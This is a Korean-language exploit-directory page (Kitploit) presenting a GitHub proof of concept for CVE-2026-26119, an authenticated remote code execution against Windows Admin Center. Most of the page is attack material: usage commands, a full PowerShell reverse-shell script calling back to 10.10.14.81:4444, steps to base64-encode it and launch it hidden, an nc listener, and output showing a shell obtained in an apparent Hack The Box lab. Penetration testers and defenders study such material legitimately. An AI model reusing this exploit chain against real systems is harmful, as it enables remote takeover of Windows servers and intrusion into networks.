Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-26119 — WinREST/PowerShell invokeCommand를 통한 Windows Admin Center용 인증된 원격 코드 실행 익스플로잇; 자격 증명을 받아 인코딩된 리버스 셸을 포함한 임의의 PowerShell 명령을 실행합니다. | Kitploit
도구/GitHubGitHub/cyb3rwitch3r/cve-2026-26119
ExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubcyb3rwitch3r/cve-2026-26119

CVE-2026-26119

WinREST/PowerShell invokeCommand를 통한 Windows Admin Center용 인증된 원격 코드 실행 익스플로잇; 자격 증명을 받아 인코딩된 리버스 셸을 포함한 임의의 PowerShell 명령을 실행합니다.

저장소 보기
111일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-26119

WAC RCE - CVE-2026-26119 WinREST/PowerShell invokeCommand를 통한 Windows Admin Center 인증 RCE.

사용법:

root@kitploit:~
    python3 wac_rce.py <user> <pass> "<powershell command>"
    WAC_PASS=<pass> python3 wac_rce.py <user>

환경 변수:

root@kitploit:~
    WAC_BASE  - override target base URL (default below)
    WAC_PASS  - password, used if not passed positionally

root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ python3 wac_rce.py 'anderson.w' 'Password' 'whoami'      
danglingtree\anderson.w

리버스 셸을 얻는 방법:

root@kitploit:~
cat > revshell.ps1 << 'EOF'                                      
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.81',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
EOF
root@kitploit:~
cat revshell.ps1 | iconv -t utf-16le | base64 -w 0 > revshell.b64

nc 리스너 생성:

root@kitploit:~
nc -nlvp 4444
root@kitploit:~
python3 wac_rce.py 'anderson.w' 'Password' "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop -enc $(cat revshell.b64)'"
root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.171.81] 54318
$Host.UI.RawUI.WindowTitle = "shell"
PS C:\Users\anderson.w\Documents>
도구 다운로드